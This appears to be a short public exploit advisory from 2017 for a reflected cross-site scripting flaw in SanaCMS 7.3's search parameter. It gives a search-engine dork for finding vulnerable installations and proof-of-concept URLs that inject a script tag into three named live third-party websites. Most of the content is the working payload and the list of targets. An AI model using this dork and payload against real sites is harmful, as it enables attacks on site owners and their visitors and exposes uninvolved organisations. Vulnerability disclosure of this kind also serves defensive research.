*=============================================================|
|A Exploit Title: SANADATA | SanaCMS 7.3 Cross Site Scripting
|
|A Exploit Author: Hosein Askari
|
|A Vendor HomePage: https://www.sanadata.com/|
|
|A Version : 7.3
|
|A Dork : intext:"SANADATA | SanaCMS 7.3"
|
|A Tested on:Parrot OS
|
|A Date: 3 /2 / 2017
|
|Gategory: WebApplication
*=============================================================|
|Vulnerability Path : http://127.0.0.1/fa/index.asp?p=search&search=
*===========================|
| Proof :
|
|http://www.corianco.com/fa/index.asp?p=search&search=<script>alert("xss")</script>
|http://www.esmhome.com/en/index.asp?p=search&search=<script>alert("xss")</script>
http://www.goldstarlogistics.org/fa/index.asp?p=search&search=<script>alert("xss")</script>
*===========================|
| Vulnerability description
|This CMS has a Cross Site Scripting Vulnerability
*=============================================================|
| Discovered By : C0NSTANTINE
*=============================================================|